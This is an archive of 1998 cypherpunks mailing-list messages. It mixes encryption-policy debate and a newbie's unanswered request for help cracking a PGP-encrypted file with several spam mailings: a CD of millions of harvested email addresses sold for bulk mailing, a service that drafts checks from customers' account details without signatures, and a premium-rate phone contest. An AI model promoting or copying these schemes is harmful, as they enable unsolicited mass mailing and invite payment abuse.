PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 1 Mar 1998 22:30:58 -0800 (PST)
To: Tim May <cypherpunks@toad.com
Subject: Re: HP Crypto Export
In-Reply-To: <v03102804b11e1e1fd2f8@[207.167.93.63]>
Message-ID: <v0300781fb12000d44123@[204.254.22.36]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:58 -0500 2/28/98, Declan McCullagh wrote:
>Now, the FBI wants to ban U.S. software without such peepholes. Doesn't
>crypto-crippleware make it much easier for the government to issue only
>key recovery tokens when everyone's existing ones expire?
>"Whatever the law is in the U.S., we will comply," says CEO Lewis Platt.

Had dinner with some local cypherpunks this evening. Talked about the HP
issue (likely to have one of their reps at the next mtg, maybe in four
weeks). An analogy: a gun that stops firing after a year and requires
government permission to be reactivated. If the manufacturer isn't out of
business by then...

Sure hope this doesn't become the trend,for software in general or
cryptoware in particular.

Put another way, this arguably is more disturbing than Clipper. At least
you know what you're getting then. You may not know 'xactly what your PAT
does.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike <blazer@mail.nevalink.ru>
Date: Sun, 1 Mar 1998 18:02:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Newbie pgp question
Message-ID: <34FA122A.74E4@mail.nevalink.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hi guys,
I've got a question - may be it is FAQ, the please point me.
I need - well, it sounds funny - to crack PGP-encrypted text ;)
I have secring.pgp but not the keyphrase - does it make things easier or
not?
I also have pgpcrack99.zip (DOS-version, zip means that I unzipped it
for the 1st time :)  But I guess it will take megahours with big
dictionary - and it will cover only single words, not sentences.
Please, can somebody introduce me a little?

TIA
PS. I also know few words in that file, may be even phrases.
-- 

*******************************************
Mike Blazer
blazer@mail.nevalink.ru
*******************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fabio Rosetti" <frosetti@hotmail.com>
Date: Mon, 2 Mar 1998 06:13:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19980302141306.3464.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Mon, 2 Mar 1998 17:28:30 -0800 (PST)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>
Message-ID: <3.0.5.32.19980302124517.008b7260@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:02 AM 2/21/98 -0500, William H. Geiger III wrote:
> > > 1. HTML in mail: There is just no place for this crap in e-mail. 
> > HTML is a fine format for email.  It's ASCII readable, and supports
>Yes but who needs all this crap in e-mail??
>E-Mail is a messaging protocol not a protocol for large documents 

Nonsense.  E-Mail is an interface for mailing stuff to people,
and an email system that can't handle large documents is broken.
In particular, the MickeysoftMail view that the contents of a message
belong in attachments rather than message body is broken
(it's partly due to myopia, and partly because some of the popular
Windows GUI programming widgets can't handle more than 32KB.)

>I must admit that atleast MS Outlook follows the RFC's and makes use of
>multipart/alternative when sending out HTML formated messages so others
>are not forced to use a webbrowser to read their mail (unlike Net$cape or
>Eudora).  There is no place for HTML in e-mail plain and simple.
>I do not wan't to have to load a huge bloated bugfilled webbrowser 
>just to process my e-mail messages.

First of all, you don't need a web browser to read HTML.
Eudora doesn't use one - it displays it natively.
(If you attach an HTML attachment rather than putting HTML in the body,
then you need an HTML viewer (which may or may not be a web browser), 
but that's the same as needing a text viewer to view text attachments.)
	(Netscape _is_ a huge bloated buggy web browser, and you could
	argue about whether it needs to have a mailreader hung off the side,
	but it's helped them with their market share, and if you
	don't like it, use Eudora.)

Furthermore, HTML is written in ASCII, and designed to be human-readable,
and designed so the user can choose how to display it -
HTML viewers are supposed to display documents in the user's preferred
formats given the limitations of the display device.
If you like Netscape or IE 4.x browsers to view HTML, use them, 
but if you'd prefer Lynx for a lean, mean browser, 
or MSWord or another viewer like HoTMetaL, go ahead.

Some people like to send rich-text attachments.  HTML is a much better
standard for doing that than some MS proprietary format.
Most of the rich text mail I get at work is in proprietary MS formats,
(most of it that I get at home is SPAM :-), which means I need to use
a buggy bloated word processor to read it, except when Exchange
feels like using its Outlook Evil Twin to display the stuff,
but it's somewhat pleasant to have colors and fonts available.


>>Netscape mail is adequate for many people, just as Eudora is. 
>>Newer versions are pretty bloated, but including 
>>S/MIME mail encryption for everybody is a Good Thing.
>Now this is really scary. You consider pushing weak 40bit S/MIME on the
>internet users a GoodThing(TM)?  I think you need to sit down and rethink

40 bit?  Not good, but domestic versions are supposed to support 128;
maybe they don't in practice.  (NS 3.x was bloated enough that I haven't
upgraded to 4.x)   And getting people in the habit of using
crypto is a good thing.  

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Mon, 2 Mar 1998 17:28:15 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: Radio Frequency Warfare Hearing
In-Reply-To: <1.5.4.32.19980228131755.00718780@pop.pipeline.com>
Message-ID: <3.0.5.32.19980302125612.007e55f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 AM 2/28/98 -0500, John Young wrote:
>We offer the lengthy prepared testimony at the Joint 
>Economic Committee hearing February 25 on "Radio Frequency 
>Weapons and Proliferation: Potential Impact on the Economy."
>  http://jya.com/rfw-jec.htm  (112K)

John!  You can't do that!  That's putting bomb-making information
on the Internet!  It's safe to have it in government hearing documents,
where only technically incompetent Congresscritters will read it,
but by letting the public know, you're facilitating right-wing 
conspiracies and anarchists and terrorists and teenage kids
and all those other dangerous people getting access to weapons
of low-mass destruction!

On a slightly more serious note, I'm surprised from the
excerpts of the description that the $500 of parts would
generate enough joules of electrical energy induced into
sensitive parts of computer equipment in some reasonable range
to do a lot of damage.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Mon, 2 Mar 1998 13:40:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: FW: Business Week on encryption controls
Message-ID: <199803022130.NAA26747@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



-----Original Message-----
From: Anonymous <nobody@replay.com>
To: cypherpunks@cyberpass.net <cypherpunks@cyberpass.net>
Date: Monday, March 02, 1998 10:47
Subject: Business Week on encryption controls


>From
>
>http://www.businessweek.com/premium/10/b3568070.htm
>
>THE GREAT ENCRYPTION DEBATE
>
>>Is all this firepower necessary? Many veterans of the decade-long
>>encryption battle believe Freeh's plan is too extreme to even take
>>seriously. ''Proposals like this are a tremendous stalking horse, but
>>are dead on arrival,'' says Kawika Daguio, encryption-policy expert at
>>the American Bankers Assn.
>
>Many cypherpunks seem to believe it is only a matter of time before
>crypto is made illegal in the U.S.  But sophisticated observers think
>otherwise.
>
>Frankly, the resolution is obvious: crypto-in-a-crime will be controlled.
>If you use crypto in planning a crime, and you're convicted of the
>crime (or conspiracy), then some years will be added to the sentencing
>guidelines.  Some cypherpunks will proclaim this the end of individual
>freedom in our time.
>
>>Also, a compromise may be at hand. Senators John McCain (R-Ariz.) and
>>J. Robert Kerrey (D-Neb.) are currently working on a bill, sources say,
>>that would release exports from controls when similar encryption products
>>are already available overseas. They could also add a ban on domestic
>>controls. ''It appears McCain and Kerrey are searching for some way
>>out of what appears to be legislative gridlock,'' says Commerce Under
>>Secretary William A. Reinsch, who oversees the Administration's policy.
>
>Again, the results are clear to those with vision.  Export controls
>will be lifted, no domestic controls will be imposed on general use of
>encryption.  The only new limits will be in the sentencing guidelines,
>which already consider dozens of factors in a complex formula.
>Whether crypto was used will be a small change there, and won't effect
>anyone's life.
>
>Remember, you read it here first.
>

This guy is living his elitist life looking through rose colored glasses, with blinders on, in a vacuum, with his head buried in sand, with his neck snugly supported by his sphincter muscles.

"vision"?.... "sophisticated"?.... what is this?  If people disagree or are more cynical about what the government may or may not do concerning cryptography we are less sophisticated and/or lack vision?  What an idiot!!  Wake up and smell the bullshit you and others like you are shoveling.  McCain is a serious control freak (former AZ resident who has seen him in action) and will never, regardless of his vomitous, pendulous rhetoric, support a domestic "free encryption" standard without government controls, there will always be a catch.

The glass is not even half empty, it's shattered.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@mail4.uts.ohio-state.edu>
Date: Mon, 2 Mar 1998 11:07:52 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803021907.OAA29904@mail4.uts.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Mon, 2 Mar 1998 14:07:36 -0500 (EST)
from ts35-10.homenet.ohio-state.edu [140.254.114.193]

   ----- The following addresses had permanent fatal errors -----
<54689590@hotmail.com>

   ----- Transcript of session follows -----
... while talking to mail.hotmail.com.:
>>> RCPT To:<54689590@hotmail.com>
<<< 550 Unknown user <54689590>
550 <54689590@hotmail.com>... User unknown


Reporting-MTA: dns; mail4.uts.ohio-state.edu
Received-From-MTA: DNS; ts35-10.homenet.ohio-state.edu
Arrival-Date: Mon, 2 Mar 1998 14:07:36 -0500 (EST)

Final-Recipient: RFC822; 54689590@hotmail.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mail.hotmail.com
Diagnostic-Code: SMTP; 550 Unknown user <54689590>
Last-Attempt-Date: Mon, 2 Mar 1998 14:07:44 -0500 (EST)


To: 54689590@hotmail.com
Subject: REMOVE
From: cypherpunks@toad.com
Date: Wed, 02 Jan 1980 01:41:00 -0500
Reply-To: cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 10510344@30330.com
Date: Mon, 2 Mar 1998 17:47:16 -0800 (PST)
To: Friend@public.com
Subject: New Customers for your Neighborhood Business, Church, Practice...
Message-ID: <199702170025.GAA08056@mail.com>
MIME-Version: 1.0
Content-Type: text/plain


You know that new customers are the lifeblood of any local
business; and WE CAN HELP YOU FIND MORE! 
 
That's because we know WHO'S NEW - those who recently
came to live in your market or service area. We can tell you
each month who and where they are, so that you can advertise
to them (eg by mail) before they have time to get established
with your rivals. 
 
Whether you own or manage a retail store, a clinic (medical,
dental, veterinary...), a church, club, a private school, beauty
salon, restaurant, professional office or bank - this is a prime
opportunity to gain MORE new clients and so to increase growth.  
 
What we can help you do is MORE THAN to replace customers  
who move away; to get more than your "share" of new arrivals
to Town, by putting YOUR name and special offer before them
at the very time they are making decisions about whom to
patronize.  
 
If you don't own or manage such an establishment, please pass  
this along to a friend who does. But if you do, find out more
details now from our Web site, which you can reach at 
 
http://www.famailcrt.com/c-am.com
 
Sincerely, 
 
Jim Davies 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sun, 1 Mar 1998 23:24:10 -0800 (PST)
To: (Recipient list suppressed)
Subject: One Nation update from GWB
Message-ID: <1.5.4.32.19980302060415.006edeb4@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear supporter in NSW,

Birthday raffle:
================
The response to the Birthday Raffle has been tremendous... but get in quick
before we run out of tickets (max 100,000 on offer)!

Here again are the details for participating:

The first prize is a QANTAS Global Explorer Holiday for two valued at
$12,000 - a 23 day trip visiting Paris, London, New York, Los Angeles,
Anaheim and Honolulu.

The second prize is a 7 day holiday to Hawaii at the Outrigger Reef Hotel
for two - value $5,000.

The third prize is a 7 nights stay at the Novotel Palm Cove at Cairns - value
$3,000.

You can order a book of 5 tickets (minimum) at $10 per book (or $2 per
ticket) by credit card by phoning 1800 620088.

Winner's names being drawn at One Nation's Birthday Party at 7pm on April
11th 1998.

Winners will be notified by phone and mail with the results being published
in the Sydney Morning Herald on Friday 17th April 1998.

It's Blair:
===========

Pauline Hanson has confirmed that she will be running for the lower house
seat of Blair in the next Federal election.

Full press release details can be seen at:

http://www.gwb.com.au/onenation/press/270298.html

Some Internet addresses to keep an eye on:
==========================================
"I'm so, so sorry Pauline"

While everybody else is getting in on the "Sorry" act the treatment being
meted out to Pauline Hanson by the media deserves an apology to our
favourite lady.

Here you can send an email to a moderated web page on which messages of
apology and comfort are posted to show support for the valuable work that
Pauline Hanson is doing to take Australia back from the brink.

http://www.gwb.com.au/sorry.html
------------------------------------------------
The Australian National News of the Day: 

A daily on-line paper which follows the history of One Nation. With an
extensive archive dating back over two years (archive available to subscribers)

http://www.gwb.com.au/head.html
------------------------------------------------
The four corners of Australia's Trojan Horse:

See how the Australian media are misrepresenting the news and distorting the
truth to discredit Pauline Hanson with their willing partners the ALP and
the Liberal party.
References are taken from press articles that have run in the mainstream media.

Let us remember it was the ALP and the Coalition who allowed Rupert Murdoch
(an American) and Kerry Packer to gain the hold that they have today on our
media.

See what they get in return for these favours.

http://www.gwb.com.au/gwb/news/onenation/news.html
--------------------------------------------------
Pauline Hanson's One Nation:

http://www.gwb.com.au/onenation
--------------------------------------------------

Finally, as we approach the federal election we will be calling on
volunteers to assist in mail drops etc... please get your friends and family
to subscribe to this news letter so that we can keep them informed on how
they can help Pauline and her team turn Australia around.

REMEMBER only PEOPLE POWER is going to keep Australia **One Nation**. 

That means ALL OFF YOU!! D O   I T    N O W !!!!


GWB



Scott Balson
Web master Pauline Hanson's One Nation web site





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Friend@public.com
Date: Mon, 2 Mar 1998 14:17:22 -0800 (PST)
To: Friend@public.com
Subject: Just Released!  16 Million!!!
Message-ID: <011297055501222@g_fantasm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1A

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 1800+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 10 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.  We received it just
prior to finishing production work on the new CD.  We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.  We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We cleaned these, and came up with about
100,000 addresses. These are also mixed in.

We also included a 6+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 10 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 5,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
6 Million+ 

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.


***ADDED BONUS***
All our customers will have access to our updates on the CD volume
they purchase.  That's right, we continually work on our CD.  Who 
knows when those other CDs were made. We're constantly adding 
and deleting addresses, removes. Etc.  It all comes back to quality.  
No one else offers that! 

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere...PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1A email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
JKP Enterprises
700 Boulevard 
Suite 102
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VeriSign Digital ID Center <onlineca@verisign.com>
Date: Mon, 2 Mar 1998 17:30:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Trial Class 1 VeriSign Digital ID
Message-ID: <199803030129.RAA27861@maguro-cm2.verisign.net>
MIME-Version: 1.0
Content-Type: text/plain


QUICK INSTALLATION INSTRUCTIONS
-------------------------------

To assure that someone else cannot obtain a Digital ID that contains your 
name and e-mail address, you must retrieve your Digital ID from
VeriSign's secure web site using a unique Personal Identification
Number (PIN). 

Be sure to follow these steps using the same computer you used to
begin the process.

Step 1: Copy your Digital ID PIN number. 
Your Digital ID PIN is: 7278ce06ea0aedffb942b1b7468471a3

Step 2: Go to VeriSign's secure Digital ID Center at
https://digitalid.verisign.com/getid.htm

Step 3: Paste (or enter) your Digital ID personal identification
number (PIN), then select the SUBMIT button to install
your Digital ID.

That's all there is to it!

WELCOME TO THE CLUB
-------------------

Congratulations on obtaining a Trial Class 1 Digital ID(sm) from VeriSign!  
As a Trial Digital ID holder, you join millions of users who can send 
and receive secure e-mail using the built-in features of the latest 
versions of Netscape, Microsoft, and other popular e-mail packages.  
You also gain easy access to popular websites using your Digital ID 
instead of passwords and one-step registration at websites requesting Digital IDs.



Your Digital ID contains the following information:
Name or Alias: RANDOM Q. HACKER
E-mail Address: cypherpunks@toad.com

To find out more about where and how to use your Digital ID, please visit 
us at http://www.verisign.com/ or visit our Help Desk at 
http://www.verisign.com/help/index.html. 

And don't forget that you can enjoy the benefits of a Full Service Class 1 
Digital ID-including $1000 protection under the Netsuresm Protection Plan, 
directory services, and free replacement, renewal, and revocation of your 
ID 24 hours a day, 7 days a week --for only $9.95 (U.S.) a year.  
To upgrade, please visit our Digital ID Center at http://digitalid.verisign.com. 

Thank you for choosing VeriSign! We look forward to serving your future 
electronic commerce and communications needs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Support <support@cim.accessatlanta.com>
Date: Mon, 2 Mar 1998 14:48:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Win95 Dialer?
In-Reply-To: <12D08148.7272@toad.com>
Message-ID: <34FB36B8.3204A931@cim.accessatlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


If you're asking if our internet connection service is available in the
Win '95 version, the answer is yes.   Otherwise, I suggest you call our
help desk at 1-888-229-4733 (option #1) for a more complete answer.   If
you want the Win '95 software, they can send it to you.





cypherpunks@toad.com wrote:

> Can you use Windows95 Dialup Networking with Access Atlanta?
>
> -Jim









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Mon, 2 Mar 1998 15:57:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptobook: '98 update
Message-ID: <Pine.SUN.3.96.980302184454.10555A-100000@ren.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara (author Private Idaho) has updated his Cryptobook page,
which now has information on newer software.  The configuration works
much better under Windows 95 now.

Check out: http://www.eskimo.com/~joelm/cryptbk.html

I have a text file full of notes comparing different hard drive
encryption software, if anyone would like a copy.  I settled on Best
Crypt, which uses BLOWFISH (or GOST, or DES if you're insane).  So far
it works well...except I haven't found a way to have Windows' swap file
encrypted.

Have fun...


-- 
 Andrew Fabbro [afabbro@umich.edu] [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/      313.647.2713 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@chemistry.ohio-state.edu>
Date: Mon, 2 Mar 1998 16:02:20 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Warning: could not send message for past 4 hours
Message-ID: <199803030002.TAA14183@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain

    **********************************************
    **      THIS IS A WARNING MESSAGE ONLY      **
    **  YOU DO NOT NEED TO RESEND YOUR MESSAGE  **
    **********************************************

The original message was received at Mon, 2 Mar 1998 14:14:28 -0500 (EST)
from ts35-10.homenet.ohio-state.edu [140.254.114.193]

   ----- The following addresses had transient non-fatal errors -----
<Remove@rmjent.com>

   ----- Transcript of session follows -----
451 <Remove@rmjent.com>... rmjent.com: Name server timeout
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old


Reporting-MTA: dns; chemistry.mps.ohio-state.edu
Arrival-Date: Mon, 2 Mar 1998 14:14:28 -0500 (EST)

Final-Recipient: RFC822; Remove@rmjent.com
Action: delayed
Status: 4.4.3
Last-Attempt-Date: Mon, 2 Mar 1998 19:02:17 -0500 (EST)
Will-Retry-Until: Sat, 7 Mar 1998 14:14:28 -0500 (EST)


To: Remove@rmjent.com
From: cypherpunks@toad.com
Date: Wed, 02 Jan 1980 01:47:53 -0500
Reply-To: cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: way@utz.com
Date: Mon, 2 Mar 1998 13:42:21 -0800 (PST)
To: way@utz.com
Subject: Accept Checks By Phone
Message-ID: <19980301524IAA55651@post.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Accept Checks By Fax or Telephone


Accept checks by telephone, fax or e-mail just like credit cards.  The
customers signature is not necessary.  Verbal authorization over the telephone
is all that is needed.  Increase your sales and collection results by 200% and
more.  Don't lose that all important impulse sale because your customer
doesn't have credit card or has no available credit to make a purchase.
Eliminate credit card chargebacks that can cause you to lose your credit card
merchant status!  Collect on that problem customer in advance to save you time
and money.  Do away with the check is in the mail syndrome.  It is fast and
simple to accept checks over the phone.

Donations

Collections

Sales

Monthly Payments

Post Dated Checks



Here's How It Works!

Your telephone sales or collections people simply collect the check
information right there over the phone, Telephone Check Systems supplies all
the necessary forms.  This information can either be faxed into the National
Headquarters 24 hours per day, or called in to them between 9 am and 10 PM EST
on any business day.  As soon as National Headquarters receives the
information they will immediately prepare a check against the customers bank
account.  The checks can be shipped overnight express 
so that you have them in your hands ready to deposit into your bank account
within 24 hours.  You can still withhold shipment for bank clearance just as
you might normally do with checks received in the mail or you can telephone
your customers bank to see if funds are currently available to cover the check
if that is your normal procedure.

Your Cost...As Low as $1 Per Check

Now...enjoy increased sales, payments, collections and donations at a very
economical cost.  Telephone Check Payment Systems' rates are only 1 3/4% of
the amount of the check, with a $1 minimum.  That means that a check for $57
cost you only $1.  A check for $100 cost you only $1.75...less than a credit
card order and less than the charges of any of our competitors that we know
of.  The one-time set up fee is $295 and you can use the service as much or as
little with no monthly penalties, dues or statement fees like there is with
credit card merchant accounts.

There are over 65 million consumers who have checking accounts but do not have
credit cards...plus millions of credit card holders with little or no usable
credit currently available on their cards.  You can dramatically increase your
sales by tapping into this huge market with your ability to take check
payments over the telephone.  To order your check by phone system complete the
order form below and fax to (405) 942-6553 along with your check for $295 or
credit card information.

CHECK BY PHONE ORDER FORM
(Print and fax to (405) 942-6553)

Company Name:

Shipping Address:

City/State/Zip:

Telephone Number:

Fax Number:

Your Name:

Title:

Home Phone:

TAPE YOUR CHECK HERE

or

Complete Credit Card Information Below

Circle One:

Visa   MasterCard   Amex   Discover
Card holders Name:

Card holders Address:

City/State/Zip:

Card Number:

Expiration Date:

____________________________
Signature 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Mon, 2 Mar 1998 21:18:47 -0800 (PST)
To: Yankee1428@aol.com
Subject: Shave Slaughter '98
Message-ID: <19980303051804.28157.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


I have shut down all paint factories in the area.  Shaving cream war!!  
Pshhhhhh... splat!  Ha ha!  Who's laughing now?!  I own all of the 
shaving cream companies!  I own all of their stocks!  Shave Slaughter 
'98 has started.  Prepare to die.

Hairface

-------------------
I'm assuming it's the same rules as Paint War - Perrin
------------------
fixed by Perrin
pleontks@hotmail.com
http://members.tripod.com/~pleontks
http://www.angelfire.com/az/69frank69

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Mar 1998 19:31:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Bioweaponeers
Message-ID: <1.5.4.32.19980303033445.010a4ea0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The New Yorker magazine of March 9 has a long shattering
essay on Ken Alibek, the former Soviet bioweapons expert,
William Patrick, the US's counterpart, the state of Russian 
secret bioweapons development, and prospects for the spread
and use of this WMD.

It's far more disturbingly detailed than the New York Times 
and ABC PrimeTime reports, and presents a horrific spectrum of 
gruesome details of nearly unimaginable catastrophe fermenting 
in secret laboratories and deepest black storage tanks.

If you thought nuclear weapons were terrifying, read this for a
shocking introduction to evil which will give even thermonuclear
warriors nightmares of helplessness.

Where Strangelovian physicists once ruled, now reign Mad
microbiologists.

Richard Preston is the writer, featured on PrimeTime and
author of The Hot Zone, on the Ebola virus.

For those without easy access to the magazine we offer a
copy:

   http://jya.com/bioweap.htm  (62K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Luckey Promotions" <87469789@15512.com>
Date: Mon, 2 Mar 1998 16:30:30 -0800 (PST)
To: Friend@public.com
Subject: No Subject
Message-ID: <E0y9fS0-0005Aa-00@tungsten>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Mothers day, Mothers day. 
-----------------------------------------------------------------------------------------------------------------------------------
NOW IS YOUR CHANCE TO
      WIN
THE PRIZE BELOW
---------------------------------------------------------------------------------------------------------------------------------------
  
Prize,  A 9ct Gold diamond set heart shaped pendant with 18inch chain. 
Also a luxury bouquet of flowers along with a box of Belgium chocolates.

Make your mums day special.

To enter answer the question below.
On which day of the week is Mothers Day?

Now Simply Call The Number
Below
0991 118801

The winner will be the first correct entry drawn at random by 11am on Friday 20th March 1998.

This competition is promoted by Luckey Promotions. 333a Licoln Road Peterborough Cambs PE1 2PF.
The closing date for the competition will be Friday 20th March 1998 at 10am. There will be one winner who will be
 the first correct entry drawn from the sack. The winner will be notified by phone on the 20th March 1998 between 
11am-5pm. 
Please ask permission from the person who pays the telephone bill before calling. Calls cost 1.00 per minute
Maximum cost of call 3:00
Minimum age to enter competition 18 years of age .
Open to U.K residents only.
The winners information can be obtained by calling 0181 2364221
To delete your e mail address from our database please
 inform via mail to the address above.  
  



</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 2 Mar 1998 23:57:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Is CDMF secure?
